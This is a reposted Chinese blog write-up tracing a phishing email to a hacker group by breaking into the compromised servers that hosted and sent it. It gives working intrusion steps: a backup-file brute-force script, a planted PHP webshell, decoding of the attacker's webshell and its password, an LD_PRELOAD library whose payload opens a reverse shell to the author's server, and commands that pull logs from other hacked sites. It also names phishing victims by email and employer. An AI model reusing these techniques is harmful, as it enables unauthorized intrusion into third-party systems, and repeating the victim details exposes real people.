轉載一篇非常精彩的分析溯源文章。
作者：道明君
公眾號：如何通過一封惡意郵件追蹤幕后黑客組織
paper鏈接：如何通過一封惡意郵件追蹤幕后黑客組織

---

一、前言

近日朋友收到一封來自海外的釣魚郵件，委托我幫忙分析。因此我對釣魚者身份和攻擊路徑進行了一次詳細的溯源。大致摸清了攻擊者組織身份、攻擊手法以及動機。本次溯源工作主要是通過提取攻擊者控制的肉雞服務器、網站訪問日志、攻擊者后門特征等。關聯分析這些日志和特征最終得到攻擊者的身份信息。本文以流水賬的方式，詳細記錄整個溯源過程，包括分析手法和思路，以供安全研究人員參考。

二、信息收集

這是一封冒充 Microsoft Outlook WebApp 密碼過期的釣魚郵件：

2.1 郵件正文：

Received: from sysmailout1.platon.sk (unknown [85.248.228.17])by bizmx16.qq.com (NewMx) with SMTP id for <test@test.cn>; Thu, 29 Nov 2018 06:56:41 +0800 X-QQ-SPAM: true X-QQ-FEAT: jfJxHuYZxOCSeMM7azx75jXNlqmrApsudtGuMpkas54ZAC17UV7M4b/R5+7i0PKMg4QGPsKjsZDM+XUXd0s8kb9W0jCArNfxa3+HTU9vKECwH9fbHyzA2+de0ctDM9+ziJ5w1BJI2Ppc9DVh5DYSq8ySLhcBVRj6sBsJefxrSztWrgzKi58wWFCv7LPgqOAXS+VVMyVipbTfHFacZXmdB00T62nXv8xQociZvHE+8ELBoHVgcA3ZWA7p4no8o1e0Z8ShUvX2P5FwhvXPLZQUg8HNiMhXk5NEtQVC0Y7R9JwKV2VeKybQbg== X-QQ-MAILINFO: Mms3jrkBGwMrz972clMUbgsPqZ0t5EGjrqWV2rMFcEfTT5Y9lunbPCtSM4HaaK+iUBVTvuth5bvdEvVKkuiTcOnkJ0t3khnTYcRGfQmEIZI+ZrNXlT/8QxjWMjOsiHkKyGbgfv5Gx9Qr65abnNzXymg= X-QQ-mid: bizmx16t1543445804ti4ex7suw X-QQ-CSender: www-data@m7web1.platon.sk X-QQ-ORGSender: www-data@m7web1.platon.sk X-KK-mid:bizmxp6t1543445804t9ne878su Received: from m7web1.platon.sk (m7web1.platon.sk [85.248.229.150])by sysmailout1.platon.sk (Postfix) with ESMTP id 8EFCC217002Efor <test@test.cn>; Wed, 28 Nov 2018 23:56:38 +0100 (CET) Received: by m7web1.platon.sk (Postfix, from userid 33)id 89364400A3A1; Wed, 28 Nov 2018 23:56:38 +0100 (CET) To: test@test.cn Subject: =?UTF-8?Q?Password_expiry_notice?= Date: Wed, 28 Nov 2018 23:56:38 +0100 From: =?UTF-8?Q?Microsoft_Online_Services_Team?= <no-response@365.mirohaviar.sk> Message-ID: <0a9ee06dc11866565f0302302c647c7a@www.mirohaviar.sk> X-Priority: 3 MIME-Version: 1.0 Content-Transfer-Encoding: quoted-printable Content-Type: text/html; charset="us-ascii"略...<br data-tomark-pass>The password for the Microsoft 365 account<span style=3D"font-weight: b= old;"> test@test.cn </span> has expired.<br data-tomark-pass>![mir-nc.png-57.1kB][2] <span class=3D"Apple-converted-space"></span><br data-tomark-pass>To protect your Microsoft = account, your existing password may cease to work shortly.<br data-tomark-pass> <br data-tomark-pass> You are now required to <span class=3D"Apple-converted-space"></span><a hre= f=3D"http://www.rosturplast.com/shells/logon.secureaccess/?ml=3Dtest@= test.cn "><span style=3D"font-weight: bold;">change your password</span></a> immediateIy.<span class=3D"Apple-converted-space"> <br data-tomark-pass> =2E</span><br data-tomark-pass> <a href=3D"http://www.rosturplast.com/shells/logon.secureaccess/?ml=3Dtest=@test.cn略...

2.2 分析郵件內容

根據郵件內容得到的信息如下：

釣魚網站： http://www.rosturplast.com（137.74.81.5 法國）
釣魚鏈接: http://www.rosturplast.com/shells/logon.secureaccess/?ml=test@test.cn
發件地址： no-response@365.mirohaviar.sk
服務商： Platon Technologies, s.r.o （斯洛伐克）
SMTP： sysmailout1.platon.sk （85.248.228.17 斯洛伐克）

三、滲透釣魚網站

3.1 漏洞分析

目標網站：http://www.rosturplast.com

訪問釣魚鏈接，一個克隆OWA修改密碼的的虛假頁面，我們按照正常流程走一遍，密碼隨便輸入。不出所料頁面提示密碼錯誤，這么做可以收集受害者多個密碼提高成功率，仔細想想這個功能還是很貼心的：）。

Step 1

Step 2

Step 3

抓包如下：注入、跨站之流都是不存在的。

訪問首頁，這是一家俄羅斯的塑料水管廠商，攻擊者入侵了這個網站，放置了釣魚頁面，再通過郵件傳播。

端口掃描顯示開放了一堆端口，防火墻做了策略限制。

通過掃描分析，得到淪陷主機信息如下:

[+] HOST: http://www.rosturplast.com （137.74.81.5 法國）
[+] OS: Red Hat 4.8
[+] Web Server: Apache/2.4.6 OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
[+] CMS: Joomla 3.3.3 （Joomla!是一套海外流行的建站系統，基于PHP+MySQL開發）

這是一個低版本的Joomla，joomscan掃描顯示受害網站有一堆漏洞，看起來弱不禁風，Getshell指日可待。

掃描發現PHPMailer RCE漏洞，不過需要郵件發送表單功能才能利用，這一堆漏洞里面，看起來唯一有機會的是CVE-2016-9838（Joomla! Core Remote Privilege Escalation Vulnerability），然而經過測試攻擊者（喪心病狂）貼心的把用戶注冊頁面刪除了！堵住了漏洞，導致無法利用。

機智的我（此時毫無辦法），開始掛字典整合Joomla目錄盲掃備份文件，最后發現目標存在PhpMyAdmin后臺，和一個報錯頁面，頁面顯示了網站絕對路徑和疑似以日期格式生成的網站備份的文件名。

/var/www/rosturpl/data/www/rosturplast.com/rosturplast.com.2015-11-11.zip

3.2 陷入僵局

嘗試下載這個文件，http響應404。看了一下同站有多個站點，但旁站滲透是個體力活，國外這種典型的CloudLinux+cPanel的架構不好提權。到這一步陷入了僵局，睡個午覺養養神，下午繼續研究。

wget http://www.rosturplast.com/rosturplast.com.2015-11-11.zip 錯誤 404：Not Found

3.3 后臺提權

不到萬不得已，不從旁站和C段入手，稍加思索根據報錯頁面的備份文件名格式生成日期文件，嘗試遍歷日期下載，碰碰運氣。

腳本內容：

#!/bin/bash startdate=`date -d "+0 day $1" +%Y%m%d` enddate=`date -d "+0 day $2" +%Y%m%d` while [[ $startdate -le $enddate ]] do date=$startdate startdateother=`date -d "+0 day $date" +%Y-%m-%d` dateother=$startdateother url=http://www.rosturplast.com/rosturplast.com.$dateother.zip echo "$url" startdate=`date -d "+1 day $date" +%Y-%m-%d` startdateother=`date -d "+1 day $date" +%Y-%m-%d` wget $url done

本大概跑了一個下午，當到達2017-08-07的時候，響應200狀態碼，看到rosturplast.com.2017-08-07.zip的文件大小為177M 感覺成了，解壓后果然是整站備份，果然是柳暗花明又一shell。

查看配置文件configuration.php得到數據庫連接信息，登錄PhpMyAdmin后臺。低權限無法直接寫shell，只能修改默認密碼登錄Joomla!后臺。

public $dbtype = 'mysqli'; public $host = 'localhost'; public $user = 'user***'; //敏感信息打碼 public $password = 'K********6759'; //敏感信息打碼 public $db = 'rtp_com3'; public $dbprefix = 'ms8ef_'; public $live_site = ''; public $secret = '5qp******4zU'; //敏感信息打碼

備份原始密文以備還原，將后臺密碼修改為 test123456XYZ

http://www.rosturplast.com/administrator/ admin / test123456XYZ

登錄后臺，通過模板寫入WebShell

Extensions —> Template Manager —> Template —> New Files —> PHP WebSehll

這里寫入了PHP一句話WebShell，通過Cknife（java版中國菜刀）對網站進行控制。

查看攻擊者的釣魚文件目錄，user.txt詳細記錄了上鉤的受害者信息。

3.4 日志分析

將網站文件和訪問日志下載到本地分析

[/tmp]$ tar zcvf /var/www/rosturpl/data/www/rosturplast.com/log.tar.gz /var/www/rosturpl/data/access-logs /var/www/rosturpl/data/logs/rosturplast*[/tmp]$ tar zcvf /var/www/rosturpl/data/www/rosturplast.com/www.tar.gz --exclude=/var/www/rosturpl/data/www/rosturplast.com/www.tar.gz /var/www/rosturpl/data/www/rosturplast.com/wget -c http://www.rosturplast.com/log.tar.gz && wget -c http://www.rosturplast.com/www.tar.gz? root@kali  /tmp  gzip -d *.gz ? root@kali  /tmp  ls -lh總用量 22M -rw-r----- 1 48 6313 392K 11月 30 16:19 rosturplast.com.access.log -rw-r----- 1 48 6313 418K 11月 21 08:08 rosturplast.com.access.log-20181121 -rw-r----- 1 48 6313 315K 11月 22 08:27 rosturplast.com.access.log-20181122 -rw-r----- 1 48 6313 367K 11月 23 08:08 rosturplast.com.access.log-20181123 -rw-r----- 1 48 6313 332K 11月 24 08:20 rosturplast.com.access.log-20181124 -rw-r----- 1 48 6313 394K 11月 25 08:30 rosturplast.com.access.log-20181125 -rw-r----- 1 48 6313 217K 11月 26 08:27 rosturplast.com.access.log-20181126 -rw-r----- 1 48 6313 338K 11月 27 08:07 rosturplast.com.access.log-20181127 -rw-r----- 1 48 6313 1.8M 11月 28 08:35 rosturplast.com.access.log-20181128 -rw-r----- 1 48 6313 2.3M 11月 29 08:38 rosturplast.com.access.log-20181129 -rw-r----- 1 48 6313 6.4M 11月 30 08:38 rosturplast.com.access.log-20181130 -rw-rw---- 1 48 6313 267K 11月 30 16:00 rosturplast.com.error.log -rw-rw---- 1 48 6313 3.8K 11月 21 03:44 rosturplast.com.error.log-20181121 -rw-rw---- 1 48 6313 1.9K 11月 21 14:43 rosturplast.com.error.log-20181122 -rw-rw---- 1 48 6313 1.9K 11月 23 02:30 rosturplast.com.error.log-20181123 -rw-rw---- 1 48 6313 5.0K 11月 24 01:46 rosturplast.com.error.log-20181124 -rw-rw---- 1 48 6313 8.3K 11月 25 02:07 rosturplast.com.error.log-20181125 -rw-rw---- 1 48 6313 2.3K 11月 26 05:05 rosturplast.com.error.log-20181126 -rw-rw---- 1 48 6313 4.1K 11月 27 05:34 rosturplast.com.error.log-20181127 -rw-rw---- 1 48 6313 550K 11月 28 08:35 rosturplast.com.error.log-20181128 -rw-rw---- 1 48 6313 6.5M 11月 29 07:51 rosturplast.com.error.log-20181129 -rw-rw---- 1 48 6313 1.4M 11月 30 08:38 rosturplast.com.error.log-20181130

用D盾掃網站文件，發現這個網站已成跑馬場。

攻擊者在shells/目錄下放置釣魚文件和PHP后門。

查看哪些IP訪問了后門并統計次數

查詢攻擊者IP地址

? root@kali  /tmp/rosturplast.com/log  grep "/shells/" * |grep "php" | awk -F ":" '{print $2}' |awk '{a[$1]+=1;} END {for(i in a){print a[i]" "i;}}' |sort -t " " -k 1 -n -r >ip.txt26 174.85.145.99 20 50.73.252.169 10 213.233.104.120 2 207.228.149.69 2 195.211.23.207 2 129.205.113.8? root@kali  /tmp/rosturplast.com/log  for line in $(<ip.txt); do curl https://ip.cn/\?ip\=$line ; doneIP: 174.85.145.99 來自: 美國 IP: 50.73.252.169 來自: 美國 IP: 213.233.104.120 來自: 羅馬尼亞 IP: 207.228.149.69 來自: 百慕大 IP: 195.211.23.207 來自: 俄羅斯 IP: 129.205.113.8 來自: 尼日利亞

根據后門文件名，匹配Apache訪問日志得到攻擊者的代理IP和User Agent

? root@kali  /tmp  grep "/shells" *| grep "php" |grep "POST" |awk -F ":" '{print $2 $6}' |sort |uniq129.205.113.8 - - [30/Nov/2018//www.rosturplast.com/shells/config.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36" 174.85.145.99 - - [27/Nov/2018//www.rosturplast.com/shells/config.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36" 207.228.149.69 - - [28/Nov/2018//www.rosturplast.com/shells/config.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36" 213.233.104.120 - - [27/Nov/2018//www.rosturplast.com/shells//bacu.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv 50.73.252.169 - - [29/Nov/2018//www.rosturplast.com/shells/config.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"

通過日志匹配郵箱并去重得到受害者郵箱地址

egrep '[0-Z_]{1,}@[0-Z]{1,}(\.[0-Z]{1,})+' * | awk -F "\"" '{print $2}' |awk -F "HTTP" '{print $1}' |awk -F "ml=" '{print $2}' |sort |uniq? root@kali  /tmp  egrep '[0-Z_]{1,}@[0-Z]{1,}(\.[0-Z]{1,})+' * | awk -F "\"" '{print $2}' |awk -F "HTTP" '{print $1}' |awk -F "ml=" '{print $2}' |sort |uniqalexsin54@yahoo.com //攻擊者郵箱 clavenda.payman@lbdi.net //利比亞發展投行CFO dennis@rayfields.co.za //域名失效 georges.raad@nera.net //新加坡IT基礎設施提供商員工 gthakkar@sscinc.com //美國SS&C Technologies, Inc. （印度分公司） jasonchowan223@gmail.com //攻擊者郵箱 ******@******.com //同事 jiajie.lim@cimb.com //馬來西亞聯昌國際銀行員工 kohchinbeng@bdo.com.sg //新加坡立信會計師事務所員工 mayfaithlee@hotmail.com //未知 philip@beekoo.hk //深圳市很有蜂格網絡科技有限公司CEO Point72.IR@sscinc.com //美國SS&C Technologies, Inc. shunweicapital@sscinc.com //美國SS&C Technologies, Inc.（疑似順為資本） url@email.com //無效

3.5 受害者身份識別

通過搜索引擎對這15個受害者郵箱進行身份識別。

3.5.1 alexsin54@yahoo.com / jasonchowan223@gmail.com

alexsin54@yahoo.com：攻擊者欺詐賬戶，曾被舉報過，在這里攻擊者用來作釣魚測試。 jasonchowan223@gmail.com：通過釣魚程序配置文件獲得。 ./logon.secureaccess/mail.php:$mail=“jasonchowan223@gmail.com”;
來源：http://www.payer.org/test/
來源：https://avoidaclaim.com/2018/debt-collection-fraud-using-the-name-yeung-alexander-luk/

3.5.2 clavenda.payman@lbdi.net

Mrs. Clavenda O. PAYMAN 利比亞發展投行（Liberian Bank forDevelopment and nvestment）首席財務官
來源：https://www.adfi-ci.org/downloads/telecharger.php?Fichier_a_telecharger=files/aadfi_doc_en_20130623170205.pdf&chemin=&id=91

3.5.3 georges.raad@nera.net

疑似新加坡 Nera Telecommunications Ltd（IT基礎設施提供商）公司員工
來源：http://www.nera.net/about-us.html

3.5.4 gthakkar@sscinc.com

美國SS&C Technologies, Inc. & 印度金融服務公司 Globeop Financial Services Technologies (India) Private Limited
來源：https://www.instafinancials.com/company/globeop-financial-services-india-private-limited/U67100MH2003PTC141044
來源： http://www.seepz.gov.in/writereaddatafolder/Regional%20Governing%20Council%20of%20EPCES%20for%202016-18.pdf

3.5.5 jiajie.lim@cimb.com

馬來西亞聯昌國際銀行員工（CIMB Group）
來源：https://www.cimb.com/en/who-we-are.html

3.5.6 kohchinbeng@bdo.com.sg

KOH CHIN BENG 新加坡立信會計師事務所員工
來源：https://www.bdo.com.sg/en-gb/our-people/koh-chin-beng

3.5.7 philip@beekoo.hk

深圳市很有蜂格網絡科技有限公司 CEO
來源：https://m.zhipin.com/job_detail/1407383492.html
來源：https://www.tianyancha.com/company/2349004659

四、滲透郵件發送網站

目標：mirohaviar.sk ，這是一個博客網站

4.1 漏洞掃描

服務器信息如下：

[+] HOST: mirohaviar.sk（85.248.229.150 斯洛伐克）
[+] OS: Debian 7
[+] Web Server:Apache/2.2.22 PHP/5.2.6-1+lenny16
[+] CMS: Joomla 1.5

CMS漏洞掃描得到圖示的漏洞信息，經過測試全部無法利用，其他端口也沒有發現可以利用的的漏洞，看來攻擊者也是一個勤奮的同學，入侵成功后做了相應的修復和加固，看起來毫無辦法，好像只能旁站或者C段滲透了。

然而有人的地方就有江湖，有黑客入侵過的網站一定有后門。這類利用通用漏洞批量入侵的黑客團伙，后門文件一般都有特征，我根據前一個網站獲得的php后門文件名列表，批量訪問當前網站得到了三個相同的后門文件。

? root@kali  /tmp/rosturplast.com/webroot/shells  md5sum * 724e7316427151ea1f449f38a28f642c 406.php 3e8a7cf7049e8b9ab8dfca7d3c827c4a aaaa aaf775b99997c166ff45677806d809de an.php e5c06f1f66781ba5c39d909096c4cd47 a.txt f71ad06982064b125d155b6f601198b8 bacu.php f2d7553b97d8e0a0258e48c3ca42a7d2 baer.php c01a0691c484a8d00977a100d8706b50 cfg.php e5c06f1f66781ba5c39d909096c4cd47 config.php md5sum: logon.secureaccess: 是一個目錄 983ba05973b84e33e76916ca0dabedec new2bug.txt 1c014f955a67974dc779100c13162f1a priv8.php 2a73dda7ebb3b8d1c0d094b79623e9ff setup.php 80b5dadd0a9856f1e6d950843140d24e switch-security.php 48f50fb676028e0ae82f3f2db4e26247 unzipper.php 51f0bba7ec30b8778dca19ead016a58f webapp365.zip 58d1d66c0be0739319156702522b1b52 wso.php

相同文件名如下：

http://www.mirohaviar.sk/config.php http://www.mirohaviar.sk/an.php http://www.mirohaviar.sk/bacu.php Pro Mailer V2

其中 http://www.mirohaviar.sk/config.php 是攻擊者的加密WebShell，理論上只需解密獲得密碼就能登錄這個后門。

4.2 解密WebShell

解密過程如下

awk -F "\"" '{print $2}' config.php //去除頭尾多余字符，得到base64密文。 awk -F "\"" '{print $2}' config.php| base64 -d -i|awk -F "\"" '{print $2}' |sed 's/\\x//g' |tr -d '\\'//第一次base64解碼，得到16進制密文 awk -F "\"" '{print $2}' config.php| base64 -d -i|awk -F "\"" '{print $2}' |sed 's/\\x//g' |tr -d '\\' |xxd -r -p//第二次hex解碼，得到base64密文 awk -F "\"" '{print $2}' config.php| base64 -d -i|awk -F "\"" '{print $2}' |sed 's/\\x//g' |tr -d '\\' |xxd -r -p |base64 -d -i |awk -F "\"" '{print $2}'//第三次base64解碼，得到base64密文 awk -F "\"" '{print $2}' config.php| base64 -d -i|awk -F "\"" '{print $2}' |sed 's/\\x//g' |tr -d '\\' |xxd -r -p |base64 -d -i |awk -F "\"" '{print $2}' |base64 -d -i |awk -F "\"" '{print $2}' //第四次base64解碼，得到base64密文 awk -F "\"" '{print $2}' config.php| base64 -d -i|awk -F "\"" '{print $2}' |sed 's/\\x//g' |tr -d '\\' |xxd -r -p |base64 -d -i |awk -F "\"" '{print $2}' |base64 -d -i |awk -F "\"" '{print $2}' |base64 -d -i//第五次base64解碼，得到明文

得到后門密碼hash（MD5），解密后得到明文: root （饒了個大彎原來是個弱口令，下次遇到這類先跑一下密碼）

$auth_pass = "63a9f0ea7bb98050796b649e85481845";

這個后門有點皮，做了UserAgent判斷，我瀏覽器默認設置的UA是Googlebot，訪問顯示404，這是反搜索引擎爬蟲的慣用手段，所以我換了個正常瀏覽器的UA訪問得到正常頁面。

if(!empty($_SERVER['HTTP_USER_AGENT'])) {$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {header('HTTP/1.0 404 Not Found');exit;} }

4.3 提權

通過webshell得到了具體系統信息，下一步嘗試提權，目的是獲得Apache的web訪問日志。

4.3.1 突破disable_functions

測試發現目標限制跨目錄（open_basedir），并禁用了命令執行函數，導致WebShell權限下，無法跨目錄訪問也無法執行命令。

disable_functions： escapeshellarg,escapeshellcmd,exec,passthru,proc_close,proc_get_status,proc_nice,proc_open,proc_terminate,shell_exec,system,popen,pcntl_exec open_basedir： /storage/www/mirohaviar.sk/:/storage/www-include/:/usr/share/php5/:/usr/share/file/:/usr/share/pear/:/tmp/

突破的手段很多，這里我利用LD_PRELOAD動態鏈接來劫持php的mail函數突破disable_functions執行系統命令。

查看sendmail函數在執行過程中動態調用哪些標準庫函數。

www-data@m7web1:/tmp$ readelf -Ws /usr/sbin/sendmail Symbol table '.dynsym' contains 420 entries:Num: Value Size Type Bind Vis Ndx Name0: 0000000000000000 0 NOTYPE LOCAL DEFAULT UND 1: 0000000000000000 0 FUNC GLOBAL DEFAULT UND __printf_chk@GLIBC_2.3.4 (2)2: 0000000000000000 0 FUNC GLOBAL DEFAULT UND getegid@GLIBC_2.2.5 (3)3: 0000000000000000 0 FUNC GLOBAL DEFAULT UND dane_raw_tlsa@DANE_0_0 (4)4: 0000000000000000 0 FUNC GLOBAL DEFAULT UND gnutls_ocsp_resp_print@GNUTLS_3_4 (5)5: 0000000000000000 0 FUNC GLOBAL DEFAULT UND gnutls_x509_crt_get_serial@GNUTLS_3_4 (5)6: 0000000000000000 0 FUNC GLOBAL DEFAULT UND __errno_location@GLIBC_2.2.5 (3)7: 0000000000000000 0 FUNC GLOBAL DEFAULT UND gnutls_db_set_cache_expiration@GNUTLS_3_4 (5)8: 0000000000000000 0 FUNC GLOBAL DEFAULT UND sendto@GLIBC_2.2.5 (3)......76: 0000000000000000 0 FUNC GLOBAL DEFAULT UND getuid@GLIBC_2.2.5 (3)77: 0000000000000000 0 FUNC GLOBAL DEFAULT UND send@GLIBC_2.2.5 (3)

從中選取geteuid函數進行測試，編寫動態鏈接程序bypass.c

#include<stdlib.h> #include <stdio.h> #include<string.h> void payload() {system("bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/999 0>&1"); } int geteuid() { if(getenv("LD_PRELOAD") == NULL) { return 0; } unsetenv("LD_PRELOAD"); payload(); }

當這個共享庫中的geteuid被調用時，嘗試加載payload()函數，執行命令調用system執行一個反彈shell的操作（http://xxx.xxx.xxx.xxx即是我的公網服務器IP）

編譯

gcc -c -fPIC bypass.c -o bypass gcc -shared bypass.c -o bypass.so

上傳

www-data@m7web1:/tmp$ cat b64.txt|base64 -d >bypass.so www-data@m7web1:/tmp$ file bypass.so file bypass.so bypass.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV)

執行

bypass.php

<?php putenv("LD_PRELOAD=/tmp/bypass.so"); mail("test@localhost","","","",""); ?>

瀏覽器訪問http://www.mirohaviar.sk/bypass.php頁面后成功執行命令，得到了一個www-user權限的反彈shell。

4.3.2 發現行蹤
仔細看這是一家斯洛伐克的網絡公司，這臺服務器上面托管了五百多個網站，當前的權限可以訪問這些網站的文件和數據庫，令人遺憾的的是apache日志目錄/var/log/apache2/無權限訪問。

不過我在**/tmp**目錄下面發現了一個有趣的日志文件。

[/tmp/]$cat w --2018-11-26 04:49:06-- http://187.85.134.4/cacat/mm.tgz Connecting to 187.85.134.4:80... connected. HTTP request sent, awaiting response... 200 OK Length: 769309 (751K) [application/x-gzip] Saving to: 'mm.tgz'0K .......... .......... .......... .......... .......... 6% 174K 4s50K .......... .......... .......... .......... .......... 13% 176K 4s100K .......... .......... .......... .......... .......... 19% 14.1M 2s150K .......... .......... .......... .......... .......... 26% 353K 2s200K .......... .......... .......... .......... .......... 33% 353K 2s250K .......... .......... .......... .......... .......... 39% 19.8M 1s300K .......... .......... .......... .......... .......... 46% 355K 1s350K .......... .......... .......... .......... .......... 53% 28.7M 1s400K .......... .......... .......... .......... .......... 59% 23.6M 1s450K .......... .......... .......... .......... .......... 66% 344K 1s500K .......... .......... .......... .......... .......... 73% 18.0M 0s550K .......... .......... .......... .......... .......... 79% 360K 0s600K .......... .......... .......... .......... .......... 86% 20.4M 0s650K .......... .......... .......... .......... .......... 93% 20.2M 0s700K .......... .......... .......... .......... .......... 99% 12.7M 0s750K . 100% 2438G=1.3s2018-11-26 04:49:10 (577 KB/s) - 'mm.tgz' saved [769309/769309]

4.4 追蹤

根據泄露日志，使用谷歌搜索關鍵字：http://187.85.134.4，發現了一個歷史頁面。

其中多個WebShell緩存頁面內容跟上一個被黑網站的臨時目錄中發現的日志內容吻合，疑似自動化攻擊留下的日志，WebShell底部署名：Muslim Cyber Corp - Mujahidin Cyber Army - Family Attack Cyber，表明后門均為這個黑客組織所有。

進一步搜索這個黑客組織名稱，發現大量被黑網站，程序使用Wordpress與Joomla居多。

4.5 提取日志

我提取了其中幾個被入侵網站的訪問日志。

4.5.1 網站：www.radiolanalhue.cl

打包

tar zcvf /home/radiolanalhue/public_html/www.radiolanalhue.cl.tar.gz --exclude=/home/radiolanalhue/public_html/www.radiolanalhue.cl.tar.gz /home/radiolanalhue/public_html/ tar zcvf /home/radiolanalhue/public_html/www.radiolanalhue.cl.log.tar.gz /home/radiolanalhue/logs/radiolanalhue.cl-ssl_log-Nov-2018.gz /home/radiolanalhue/access-logs/ /home/radiolanalhue/access-logs/radiolanalhue.cl

下載

wget -c http://www.radiolanalhue.cl/www.radiolanalhue.cl.tar.gz wget -c http://www.radiolanalhue.cl/www.radiolanalhue.cl.log.tar.gz

分析

根據后門文件名，匹配Apache訪問日志，到攻擊者代理IP和User Agent。? ? root@kali  /tmp/radiolanalhue.cl/log/  grep "/beez5/" radiolanalhue.cl-Dec-2018疑似攻擊者代理IP：212.1.211.3 （美國） - - [30/Nov/2018:13:35:36 -0300] "GET /online/templates/beez5/bc.php HTTP/1.1" 200 16823 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"谷歌爬蟲： 66.249.66.149 - - [01/Dec/2018:00:53:57 -0300] "GET /online/templates/beez5/bc.php HTTP/1.1" 200 16823 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"66.249.66.151 - - [01/Dec/2018:06:34:34 -0300] "GET /online/templates/beez5/bc.php?filesrc=/home/radiolanalhue/public_html/online/templates/beez5/favicon.ico&path=/home/radiolanalhue/public_html/online/templates/beez5 HTTP/1.1" 200 2348 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"66.249.66.153 - - [01/Dec/2018:06:51:46 -0300] "GET /online/templates/beez5/bc.php?filesrc=/home/radiolanalhue/public_html/online/templates/beez5/component.php&path=/home/radiolanalhue/public_html/online/templates/beez5 HTTP/1.1" 200 5456 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

4.5.2 網站：zebramedia.al

打包

tar zcvf /home/vayqpdvg/zebramedia.al/zebramedia.al-www.tar.gz --exclude=/home/vayqpdvg/zebramedia.al/zebramedia.al-www.tar.gz /home/vayqpdvg/zebramedia.al/ tar zcvf /home/vayqpdvg/zebramedia.al/zebramedia.al-log.tar.gz /home/vayqpdvg/logs

下載

wget http://zebramedia.al/zebramedia.al-log.tar.gz wget http://zebramedia.al/zebramedia.al-www.tar.gz-rw-r--r-- 1 1365 1328 478714 11月 30 21:15 evropakrijuese.publik.live-Nov-2018.gz -rw-r--r-- 1 1365 1328 6463 11月 30 21:15 evropakrijuese.publik.live-ssl_log-Nov-2018.gz -rw-r--r-- 1 1365 1328 1855430 6月 30 2018 ftp.publik.live-ftp_log-Jun-2018.gz -rw-r--r-- 1 1365 1328 7899 11月 27 21:12 ftp.publik.live-ftp_log-Nov-2018.gz -rw-r--r-- 1 1365 1328 22883767 11月 30 21:15 ief.publik.live-Nov-2018.gz -rw-r--r-- 1 1365 1328 67526 11月 30 21:15 ief.publik.live-ssl_log-Nov-2018.gz -rw-r--r-- 1 1365 1328 68187 11月 30 21:15 instadyqan.publik.live-Nov-2018.gz -rw-r--r-- 1 1365 1328 34530 11月 30 21:15 instadyqan.publik.live-ssl_log-Nov-2018.gz -rw-r--r-- 1 1365 1328 35748 11月 30 21:15 pigmentnews.publik.live-Nov-2018.gz -rw-r--r-- 1 1365 1328 7709 11月 28 21:15 pigmentnews.publik.live-ssl_log-Nov-2018.gz -rw-r--r-- 1 1365 1328 129055 11月 30 21:15 publik.live-Nov-2018.gz -rw-r--r-- 1 1365 1328 14487 11月 30 21:15 publik.live-ssl_log-Nov-2018.gz -rw-r--r-- 1 1365 1328 88292 11月 30 21:15 zebramedia.publik.live-Nov-2018.gz -rw-r--r-- 1 1365 1328 139759 11月 30 21:15 zebramedia.publik.live-ssl_log-Nov-2018.gz -rw-r--r-- 1 1365 1328 6047261 11月 30 21:15 zeri-popullit.publik.live-Nov-2018.gz -rw-r--r-- 1 1365 1328 52004 11月 30 21:15 zeri-popullit.publik.live-ssl_log-Nov-2018.gz

分析

根據后門文件名，匹配Apache訪問日志，到攻擊者代理IP和User Agent。? root@kali  /tmp/zebramedia.al/log/home/vayqpdvg/logs  grep "INSTALL.sql.txt.php" * |grep "php" | awk -F ":" '{print $2}' |awk '{a[$1]+=1;} END {for(i in a){print a[i]" "i;}}' |sort |uniq148 197.211.61.82 (尼日利亞) 8 178.128.221.199 （希臘）? root@kali  /tmp/zebramedia.al/log/home/vayqpdvg/logs  grep "INSTALL.sql.txt.php" * | grep "php" |grep "POST" |awk -F ":" '{print $2 $6}' |sort |uniq178.128.221.199 - - [29/Nov/2018//www.zebramedia.al/wp-content/themes/shells/INSTALL.sql.txt.php" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36"197.211.61.82 - - [29/Nov/2018//www.zebramedia.al/wp-content/themes/shells/INSTALL.sql.txt.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"

4.5.2 網站：http://helioncomposites.com

打包

